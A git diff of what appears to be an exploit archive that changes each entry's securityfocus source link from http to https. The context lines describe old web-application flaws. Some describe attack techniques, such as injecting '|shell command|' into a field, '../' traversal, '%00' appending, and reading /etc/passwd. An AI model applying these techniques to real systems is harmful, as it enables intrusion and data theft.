a/exploits/cfm/webapps/29567.txt +++ b/exploits/cfm/webapps/29567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22401/info +source: https://www.securityfocus.com/bid/22401/info Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cfm/webapps/30202.txt b/exploits/cfm/webapps/30202.txt index e55f385a7..92e36bc6c 100644 --- a/exploits/cfm/webapps/30202.txt +++ b/exploits/cfm/webapps/30202.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24528/info +source: https://www.securityfocus.com/bid/24528/info FuseTalk is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/cfm/webapps/30206.txt b/exploits/cfm/webapps/30206.txt index 45e7619de..6f2757c67 100644 --- a/exploits/cfm/webapps/30206.txt +++ b/exploits/cfm/webapps/30206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24563/info +source: https://www.securityfocus.com/bid/24563/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/30216.txt b/exploits/cfm/webapps/30216.txt index e4c370398..a53b78d13 100644 --- a/exploits/cfm/webapps/30216.txt +++ b/exploits/cfm/webapps/30216.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24564/info +source: https://www.securityfocus.com/bid/24564/info FuseTalk is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33167.txt b/exploits/cfm/webapps/33167.txt index 136b27161..6014e884a 100644 --- a/exploits/cfm/webapps/33167.txt +++ b/exploits/cfm/webapps/33167.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33168.txt b/exploits/cfm/webapps/33168.txt index d3b85ef83..ff93e2882 100644 --- a/exploits/cfm/webapps/33168.txt +++ b/exploits/cfm/webapps/33168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33169.txt b/exploits/cfm/webapps/33169.txt index 3125abaa7..67f40e978 100644 --- a/exploits/cfm/webapps/33169.txt +++ b/exploits/cfm/webapps/33169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33170.txt b/exploits/cfm/webapps/33170.txt index 56cc1efe2..19d56b42e 100644 --- a/exploits/cfm/webapps/33170.txt +++ b/exploits/cfm/webapps/33170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36046/info +source: https://www.securityfocus.com/bid/36046/info Adobe ColdFusion is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/cfm/webapps/33575.txt b/exploits/cfm/webapps/33575.txt index 9ee8ba273..158df32db 100644 --- a/exploits/cfm/webapps/33575.txt +++ b/exploits/cfm/webapps/33575.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37986/info +source: https://www.securityfocus.com/bid/37986/info CommonSpot Server is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33916.txt b/exploits/cfm/webapps/33916.txt index e1b9c76f9..92889c331 100644 --- a/exploits/cfm/webapps/33916.txt +++ b/exploits/cfm/webapps/33916.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39864/info +source: https://www.securityfocus.com/bid/39864/info Mango Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/33948.txt b/exploits/cfm/webapps/33948.txt index 13327b9cc..3e5f77d91 100644 --- a/exploits/cfm/webapps/33948.txt +++ b/exploits/cfm/webapps/33948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39973/info +source: https://www.securityfocus.com/bid/39973/info Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/cfm/webapps/35107.txt b/exploits/cfm/webapps/35107.txt index 3caa82121..e263bb6f2 100644 --- a/exploits/cfm/webapps/35107.txt +++ b/exploits/cfm/webapps/35107.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45384/info +source: https://www.securityfocus.com/bid/45384/info Mura CMS is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/cfm/webapps/35256.txt b/exploits/cfm/webapps/35256.txt index 067260fa5..dd1ddaa83 100644 --- a/exploits/cfm/webapps/35256.txt +++ b/exploits/cfm/webapps/35256.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45985/info +source: https://www.securityfocus.com/bid/45985/info ActiveWeb Professional is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. diff --git a/exploits/cfm/webapps/36067.txt b/exploits/cfm/webapps/36067.txt index 00b6b21dc..5ee85329a 100644 --- a/exploits/cfm/webapps/36067.txt +++ b/exploits/cfm/webapps/36067.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49220/info +source: https://www.securityfocus.com/bid/49220/info Adobe ColdFusion is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/cfm/webapps/36172.txt b/exploits/cfm/webapps/36172.txt index 472b2fc26..8a848e7c3 100644 --- a/exploits/cfm/webapps/36172.txt +++ b/exploits/cfm/webapps/36172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49787/info +source: https://www.securityfocus.com/bid/49787/info Adobe ColdFusion is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/cgi/dos/19899.txt b/exploits/cgi/dos/19899.txt index 157485f4b..3dc149746 100644 --- a/exploits/cgi/dos/19899.txt +++ b/exploits/cgi/dos/19899.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1175/info +source: https://www.securityfocus.com/bid/1175/info UltraBoard 1.6 (and possibly all 1.x versions and the new beta Ultraboard 2000) are vulnerable to this Denial of Service attack. diff --git a/exploits/cgi/dos/20071.c b/exploits/cgi/dos/20071.c index 84119a776..9d7ef4b31 100644 --- a/exploits/cgi/dos/20071.c +++ b/exploits/cgi/dos/20071.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1463/info +// source: https://www.securityfocus.com/bid/1463/info The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter. diff --git a/exploits/cgi/dos/20400.txt b/exploits/cgi/dos/20400.txt index 68dad4a40..98966c421 100644 --- a/exploits/cgi/dos/20400.txt +++ b/exploits/cgi/dos/20400.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1934/info +source : https://www.securityfocus.com/bid/1934/info Cart32 is a shopping cart application for e-commerce enabled sites. diff --git a/exploits/cgi/dos/20753.txt b/exploits/cgi/dos/20753.txt index 91a04948b..ff0aa698b 100644 --- a/exploits/cgi/dos/20753.txt +++ b/exploits/cgi/dos/20753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2588/info +source: https://www.securityfocus.com/bid/2588/info Net.Commerce is part of the Websphere platform of products distributed by IBM. Net.Commerce provides several versatile features to facilitate e-commerce, and features in performance and reliability. diff --git a/exploits/cgi/dos/21048.txt b/exploits/cgi/dos/21048.txt index 723219fc0..26d733b02 100644 --- a/exploits/cgi/dos/21048.txt +++ b/exploits/cgi/dos/21048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3155/info +source: https://www.securityfocus.com/bid/3155/info responder.cgi' is a free CGI shell script, written in C, for MacHTTP Server and other MacOS webserver products. diff --git a/exploits/cgi/dos/21620.txt b/exploits/cgi/dos/21620.txt index 78b25648b..59e6f5a47 100644 --- a/exploits/cgi/dos/21620.txt +++ b/exploits/cgi/dos/21620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5248/info +source: https://www.securityfocus.com/bid/5248/info A vulnerability has been reported for Oddsock Song Requester 2.1. diff --git a/exploits/cgi/dos/24619.txt b/exploits/cgi/dos/24619.txt index 74c84b7b1..e4591588c 100644 --- a/exploits/cgi/dos/24619.txt +++ b/exploits/cgi/dos/24619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11226/info +source: https://www.securityfocus.com/bid/11226/info Reportedly EmuLive Server4 is affected by an authentication bypass vulnerability and a denial of service vulnerability. These issues are due to an access validation issue and a failure to handle exceptional conditions. diff --git a/exploits/cgi/dos/39073.txt b/exploits/cgi/dos/39073.txt index 4c8def36e..44db546db 100644 --- a/exploits/cgi/dos/39073.txt +++ b/exploits/cgi/dos/39073.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65306/info +source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. diff --git a/exploits/cgi/local/20092.txt b/exploits/cgi/local/20092.txt index c52bb995f..f81aa501c 100644 --- a/exploits/cgi/local/20092.txt +++ b/exploits/cgi/local/20092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1494/info +source: https://www.securityfocus.com/bid/1494/info A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. diff --git a/exploits/cgi/remote/19713.pl b/exploits/cgi/remote/19713.pl index bf0438fd5..421677be5 100755 --- a/exploits/cgi/remote/19713.pl +++ b/exploits/cgi/remote/19713.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/921/info +source: https://www.securityfocus.com/bid/921/info Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of various types. One of the scripts, search.cgi, accepts a parameter called letter which can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used to obtain directory listings and the first line of files outside of the intended web filesystem. diff --git a/exploits/cgi/remote/19741.pl b/exploits/cgi/remote/19741.pl index 8b0907c6c..7f499a517 100755 --- a/exploits/cgi/remote/19741.pl +++ b/exploits/cgi/remote/19741.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/967/info +source: https://www.securityfocus.com/bid/967/info WWWThreads is a web bulletin board program that uses an SQL backend. Due to incomplete input validation, it is possible for an attacker to submit SQL commands through forms and manipulate the contents of the database to gain administrator privileges over the database. diff --git a/exploits/cgi/remote/19745.txt b/exploits/cgi/remote/19745.txt index b21674bd2..7d88ac8d9 100644 --- a/exploits/cgi/remote/19745.txt +++ b/exploits/cgi/remote/19745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/974/info +source: https://www.securityfocus.com/bid/974/info 'The Finger Server' is a perl script for providing .plan-like functionality through a website. Due to insufficient input checking it is possible for remote unauthenticated users to execute shell commands on the server which will run with the priveleges of the webserver. diff --git a/exploits/cgi/remote/19747.txt b/exploits/cgi/remote/19747.txt index 7914cc3c0..faa2c6136 100644 --- a/exploits/cgi/remote/19747.txt +++ b/exploits/cgi/remote/19747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/977/info +source: https://www.securityfocus.com/bid/977/info Appending "%00" to the end of a CGI script filename will permit a remote client to view full contents of the script if the CGI module option "allow CGIs anywhere" is enabled. Scripts located in directories which are designated as executable (eg. \cgi-bin) are not vulnerable to this exploit. diff --git a/exploits/cgi/remote/19786.txt b/exploits/cgi/remote/19786.txt index e3eda935e..8829207d6 100644 --- a/exploits/cgi/remote/19786.txt +++ b/exploits/cgi/remote/19786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1028/info +source: https://www.securityfocus.com/bid/1028/info A vulnerability exists in the 1.0.8 release of DNSTools (labeled on some areas of their site as 1.08), from DNSTools Software. By manipulating the contents of certain post variables, arbitrary code may be executed. diff --git a/exploits/cgi/remote/19795.txt b/exploits/cgi/remote/19795.txt index 9466d0b49..be50d7c49 100644 --- a/exploits/cgi/remote/19795.txt +++ b/exploits/cgi/remote/19795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1036/info +source: https://www.securityfocus.com/bid/1036/info A vulnerability exists in the default installation of Caldera OpenLinux 2.3. A CGI is installed in /home/httpd/cgi-bin/ names rpm_query. Any user can run this CGI and obtain a listing of the packages, and versions of packages, installed on this system. This could be used to determine vulnerabilities on the machine remotely. diff --git a/exploits/cgi/remote/19808.txt b/exploits/cgi/remote/19808.txt index 22e121f58..b62f9eb43 100644 --- a/exploits/cgi/remote/19808.txt +++ b/exploits/cgi/remote/19808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1052/info +source: https://www.securityfocus.com/bid/1052/info Any file that the webserver has read access to can be read on a server running the Sojourn search engine. diff --git a/exploits/cgi/remote/19842.txt b/exploits/cgi/remote/19842.txt index ead25b513..34e2a31a4 100644 --- a/exploits/cgi/remote/19842.txt +++ b/exploits/cgi/remote/19842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1102/info +source: https://www.securityfocus.com/bid/1102/info Web+ is an e-commerce server designed to run under a webserver, to provide web storefronts. The various scripts that are required to do this are specified to the webpsvr daemon via a 'script' variable passed to the webplus CGI. This CGI can be passed a path to any file via the script variable, resulting in arbitrary files being displayed to the browser. This vulnerability is limited to files that are known to the user and that the webpsvr daemon has read access to. diff --git a/exploits/cgi/remote/19844.txt b/exploits/cgi/remote/19844.txt index 7618eb6f6..59698b54d 100644 --- a/exploits/cgi/remote/19844.txt +++ b/exploits/cgi/remote/19844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1104/info +source: https://www.securityfocus.com/bid/1104/info BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver. diff --git a/exploits/cgi/remote/19852.txt b/exploits/cgi/remote/19852.txt index cb3e191f1..45fbd9ea7 100644 --- a/exploits/cgi/remote/19852.txt +++ b/exploits/cgi/remote/19852.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1115/info +source: https://www.securityfocus.com/bid/1115/info Appending specific variables and values to http://target/cgi-bin/cart.pl? will allow remote users to perform certain actions. "vars" will display the configuration settings of the application, which includes the username and password used for credit card transactions. Environmental settings can be obtained using "env'". diff --git a/exploits/cgi/remote/19890.txt b/exploits/cgi/remote/19890.txt index 71518a258..f6b246b84 100644 --- a/exploits/cgi/remote/19890.txt +++ b/exploits/cgi/remote/19890.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1164/info +source: https://www.securityfocus.com/bid/1164/info UltraBoard 1.6 (and possibly all 1.x versions) is vulnerable to a directory traversal attack that will allow any remote browser to download any file that the webserver has read access to. On Windows instalations, the file must reside on the same logical drive as the webroot. In all cases, the filename and relative path from the webroot must be known to the attacker. diff --git a/exploits/cgi/remote/19909.pl b/exploits/cgi/remote/19909.pl index fcab92046..e5eb90a08 100755 --- a/exploits/cgi/remote/19909.pl +++ b/exploits/cgi/remote/19909.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1199/info +source: https://www.securityfocus.com/bid/1199/info Bugzilla is a web-based bug-tracking system based on Perl and MySQL. It allows people to submit bugs and catalogs them. diff --git a/exploits/cgi/remote/19913.txt b/exploits/cgi/remote/19913.txt index 8b642445a..991fb59c5 100644 --- a/exploits/cgi/remote/19913.txt +++ b/exploits/cgi/remote/19913.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1202/info +source: https://www.securityfocus.com/bid/1202/info Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible. diff --git a/exploits/cgi/remote/19921.txt b/exploits/cgi/remote/19921.txt index 052d22afa..f3b44a390 100644 --- a/exploits/cgi/remote/19921.txt +++ b/exploits/cgi/remote/19921.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1215/info +source: https://www.securityfocus.com/bid/1215/info Matt Kruse's Calendar script is a popular, free perl cgi-script used by many websites on the Internet. It allows a website administrator to easily setup and customize a calendar on their website. There are two components of this package, calendar-admin.pl and calendar.pl. Calendar-admin.pl calls open() with user-input in the command string but does not parse the input for metacharacters. It is therefor possible to execute arbitrary commands on the target host by passing "|shell command|" as one value of the "configuration file" field. The shell that is spawned with the open() call will then execute those commands with the uid of the webserver. This can result in remote access to the system for the attacker. Calendar.pl is vulnerable to a similar attack. diff --git a/exploits/cgi/remote/19951.php b/exploits/cgi/remote/19951.php index 7912bf476..fa42f4b54 100644 --- a/exploits/cgi/remote/19951.php +++ b/exploits/cgi/remote/19951.php @@ -1,6 +1,6 @@ E-Commerce Exchange QuickCommerce 2.5/3.0,McMurtrey/Whitaker & Associates Cart32 2.5 a/3.0,Shop Express 1.0,StoreCreator 3.0 Web Shopping Cart Hidden Form Field Vulnerability -source: http://www.securityfocus.com/bid/1237/info* +source: https://www.securityfocus.com/bid/1237/info* Various shopping cart applications use hidden form fields within the html source code with preset parameters which contain product information. For example: price, weight, quantity, identification etc. If a remote user saves the web page of a particular item to their machine it is possible for them to edit the html source, consequently allowing them to alter the parameters of the product. The modified web page can then be submitted to the shopping cart application. It is also possible in some circumstances to exploit this vulnerability via any regular browser's address bar. diff --git a/exploits/cgi/remote/19956.txt b/exploits/cgi/remote/19956.txt index aec4b91a0..65f19e594 100644 --- a/exploits/cgi/remote/19956.txt +++ b/exploits/cgi/remote/19956.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1243/info +source: https://www.securityfocus.com/bid/1243/info By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory. diff --git a/exploits/cgi/remote/19995.txt b/exploits/cgi/remote/19995.txt index db7a42f83..a52297fef 100644 --- a/exploits/cgi/remote/19995.txt +++ b/exploits/cgi/remote/19995.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1313/info +source: https://www.securityfocus.com/bid/1313/info Omitting the HTTP version from a "GET" request for a CGI script to the Savant Web Server discloses the source code of the script. diff --git a/exploits/cgi/remote/20007.c b/exploits/cgi/remote/20007.c index 3fc27b7f0..3c7e35fb3 100644 --- a/exploits/cgi/remote/20007.c +++ b/exploits/cgi/remote/20007.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1335/info +// source: https://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. diff --git a/exploits/cgi/remote/20008.txt b/exploits/cgi/remote/20008.txt index a260b32b7..6292b87d6 100644 --- a/exploits/cgi/remote/20008.txt +++ b/exploits/cgi/remote/20008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1335/info +source: https://www.securityfocus.com/bid/1335/info MailStudio 2000 is vulnerable to multiple attacks. diff --git a/exploits/cgi/remote/20041.txt b/exploits/cgi/remote/20041.txt index d5a158634..a203687a1 100644 --- a/exploits/cgi/remote/20041.txt +++ b/exploits/cgi/remote/20041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1402/info +source: https://www.securityfocus.com/bid/1402/info Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' diff --git a/exploits/cgi/remote/20059.txt b/exploits/cgi/remote/20059.txt index c29385864..afb82c12e 100644 --- a/exploits/cgi/remote/20059.txt +++ b/exploits/cgi/remote/20059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1431/info +source: https://www.securityfocus.com/bid/1431/info Poll It is a Perl CGI application used to create and maintain opinion polls on websites. The program relies on a number of internal variables. These variables can be overwritten by any remote user by specifying the new value as a variable in the GET request. This is due to the fact that Poll It overwrites variables to user-supplied values after it sets them to the internally-specified defaults. diff --git a/exploits/cgi/remote/20068.txt b/exploits/cgi/remote/20068.txt index eb7d99042..520b65094 100644 --- a/exploits/cgi/remote/20068.txt +++ b/exploits/cgi/remote/20068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1455/info +source: https://www.securityfocus.com/bid/1455/info Versions 1.4H and prior of BB4 Big Brother are susceptible to a directory traversal vulnerability which would allow a remote user to view the contents of any directory or file on the system. Executing a GET request for: diff --git a/exploits/cgi/remote/20085.txt b/exploits/cgi/remote/20085.txt index 78bfcc521..8ba81cf8a 100644 --- a/exploits/cgi/remote/20085.txt +++ b/exploits/cgi/remote/20085.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1485/info +source: https://www.securityfocus.com/bid/1485/info Alibaba Web Server fails to filter piped commands when executing cgi-scripts. This can be used to execute commands with the privileges of the web server process on a target machine. diff --git a/exploits/cgi/remote/20156.txt b/exploits/cgi/remote/20156.txt index 7027ac123..836dd9089 100644 --- a/exploits/cgi/remote/20156.txt +++ b/exploits/cgi/remote/20156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1587/info +source: https://www.securityfocus.com/bid/1587/info A remote user is capable of gaining read access to any known file residing on a host running Netwin Netauth through directory traversal. Appending a series of '../' and the desired file name to the 'page' variable at the end of a request to netauth.cgi will allow a remote user to walk the entire directory tree above the Netauth directory. diff --git a/exploits/cgi/remote/20164.pl b/exploits/cgi/remote/20164.pl index 27e8cb976..d5d513607 100755 --- a/exploits/cgi/remote/20164.pl +++ b/exploits/cgi/remote/20164.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1604/info +source: https://www.securityfocus.com/bid/1604/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command: diff --git a/exploits/cgi/remote/20165.html b/exploits/cgi/remote/20165.html index cdfe7f064..b8917739e 100644 --- a/exploits/cgi/remote/20165.html +++ b/exploits/cgi/remote/20165.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1604/info +source: https://www.securityfocus.com/bid/1604/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Account Manager. In order to accomplish this, a user would access the following URL with a POST command: diff --git a/exploits/cgi/remote/20176.pl b/exploits/cgi/remote/20176.pl index 9bb8c9535..8ba166f89 100755 --- a/exploits/cgi/remote/20176.pl +++ b/exploits/cgi/remote/20176.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1607/info +source: https://www.securityfocus.com/bid/1607/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists. diff --git a/exploits/cgi/remote/20177.html b/exploits/cgi/remote/20177.html index 4e401d4ac..ff72fe7ee 100644 --- a/exploits/cgi/remote/20177.html +++ b/exploits/cgi/remote/20177.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1607/info +source: https://www.securityfocus.com/bid/1607/info Regardless of privilege level, any remote user can modify the administrative password for CGI Script Centers' Subscribe Me Lite. This would grant the user full administrative privileges which includes addition or removal of users from mailing lists. diff --git a/exploits/cgi/remote/20183.pl b/exploits/cgi/remote/20183.pl index 4588fc351..152628f34 100755 --- a/exploits/cgi/remote/20183.pl +++ b/exploits/cgi/remote/20183.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1621/info +source: https://www.securityfocus.com/bid/1621/info It is possible for a remote user to add an author to the author index (author.file) in GWScripts News Publisher, a web news publisher. This can be done by requesting the following raw HTTP request using any arbitrary username and password: diff --git a/exploits/cgi/remote/20194.pl b/exploits/cgi/remote/20194.pl index 58b7cab60..c745e3f05 100755 --- a/exploits/cgi/remote/20194.pl +++ b/exploits/cgi/remote/20194.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1645/info +source: https://www.securityfocus.com/bid/1645/info CGI Script Center's Auction Weaver does not verify the validity of the value in the variable 'fromfile'. Therefore it is possible to perform arbitrary commands on a remote system under the UID of the http daemon by altering the variable 'fromfile'. diff --git a/exploits/cgi/remote/20218.txt b/exploits/cgi/remote/20218.txt index 258408eb4..931130477 100644 --- a/exploits/cgi/remote/20218.txt +++ b/exploits/cgi/remote/20218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1668/info +source: https://www.securityfocus.com/bid/1668/info YaBB.pl, a web-based bulletin board script, stores board postings in numbered text files. The numbered file name is specified in the call to YaBB.pl in the variable num=. Before retrieving the file, YaBB will append a .txt extension to . diff --git a/exploits/cgi/remote/20238.txt b/exploits/cgi/remote/20238.txt index 41052e000..7691d599e 100644 --- a/exploits/cgi/remote/20238.txt +++ b/exploits/cgi/remote/20238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1710/info +source: https://www.securityfocus.com/bid/1710/info Alabanza is a web hosting provider that offers automated solutions for virtual domain hosting. A vulnerability exists in the software implemented for automated domain administration. diff --git a/exploits/cgi/remote/20242.txt b/exploits/cgi/remote/20242.txt index 1e445b936..c187533ed 100644 --- a/exploits/cgi/remote/20242.txt +++ b/exploits/cgi/remote/20242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1717/info +source: https://www.securityfocus.com/bid/1717/info SCO Unixware 7 default installation includes scohelp, an http server that listens on port 457/tcp and allows access to manual pages and other documentation files. The search CGI script provided for that purpose has a vulnerability that could allow any remote attacker to execute arbitrary code on the vulnerable machine with privileges of user "nobody". This poses a threat that could result in the remote compromise of the vulnerable host and provide a staging point from where an attacker could escalate privileges. diff --git a/exploits/cgi/remote/20244.txt b/exploits/cgi/remote/20244.txt index b38873d17..5dd3a6685 100644 --- a/exploits/cgi/remote/20244.txt +++ b/exploits/cgi/remote/20244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1720/info +source: https://www.securityfocus.com/bid/1720/info Talentsoft Web+ is a web application server that can be integrated with various web technologies. diff --git a/exploits/cgi/remote/20245.txt b/exploits/cgi/remote/20245.txt index 76d7ea679..9a3fbb8a7 100644 --- a/exploits/cgi/remote/20245.txt +++ b/exploits/cgi/remote/20245.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1722/info +source: https://www.securityfocus.com/bid/1722/info Talentsoft Web+ is a web application server that can be integrated with various web technologies. diff --git a/exploits/cgi/remote/20273.txt b/exploits/cgi/remote/20273.txt index ade89ef76..5c130c0ca 100644 --- a/exploits/cgi/remote/20273.txt +++ b/exploits/cgi/remote/20273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1762/info +source: https://www.securityfocus.com/bid/1762/info The 'cached_feed' CGI script supplied by newsfeed vendor Moreover.com contains a file-disclosure vulnerability. The script's 'obtain_file' function, designed to return the contents of a specified file for display in the browser, fails to adequately filter ".." character sequences in user-supplied input. As a result, a carefully formed URL that is submitted to the script can result in the disclosure of files (readable by HTTP user) outside of the CGI script's "allowed" area. diff --git a/exploits/cgi/remote/20277.txt b/exploits/cgi/remote/20277.txt index 4f2caeff0..7052d6a8a 100644 --- a/exploits/cgi/remote/20277.txt +++ b/exploits/cgi/remote/20277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1772/info +source: https://www.securityfocus.com/bid/1772/info Master Index is a commercially supported search engine. Certain versions of this software ship with a path traversal vulnerability. This is to say that a remote user may 'back out' (.../) of the web root directory and view/download any file which the user who is running Master Index has permission to read. diff --git a/exploits/cgi/remote/20279.txt b/exploits/cgi/remote/20279.txt index 4e617bc3c..88f2e475c 100644 --- a/exploits/cgi/remote/20279.txt +++ b/exploits/cgi/remote/20279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1774/info +source: https://www.securityfocus.com/bid/1774/info Extropia WebStore is an e-commerce shopping cart application consisting of routines for error handling, order processing, encrypted mailing, frames, Javascript and VBscript. diff --git a/exploits/cgi/remote/20280.txt b/exploits/cgi/remote/20280.txt index be8e33ca4..b91afa2ba 100644 --- a/exploits/cgi/remote/20280.txt +++ b/exploits/cgi/remote/20280.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1776/info +source: https://www.securityfocus.com/bid/1776/info Bytes Interactive Web Shopper is a XML based shopping cart application. diff --git a/exploits/cgi/remote/20281.txt b/exploits/cgi/remote/20281.txt index c1e7a8bb9..1f1ff7132 100644 --- a/exploits/cgi/remote/20281.txt +++ b/exploits/cgi/remote/20281.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1777/info +source: https://www.securityfocus.com/bid/1777/info The $page variable in Hassan Consulting Shopping Cart does not properly check for insecure relative paths such as the double dot "..". Therefore, requesting the following URL will display the specified file: diff --git a/exploits/cgi/remote/20303.pl b/exploits/cgi/remote/20303.pl index d80ae676d..cdac27cff 100755 --- a/exploits/cgi/remote/20303.pl +++ b/exploits/cgi/remote/20303.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1807/info +source: https://www.securityfocus.com/bid/1807/info OatMeal studios' Mail-File is a cgi application that allows for sending of certain files to user-specified email addresses via a web interface. A vulnerability exists in this script that can be used to send the contents of any readable 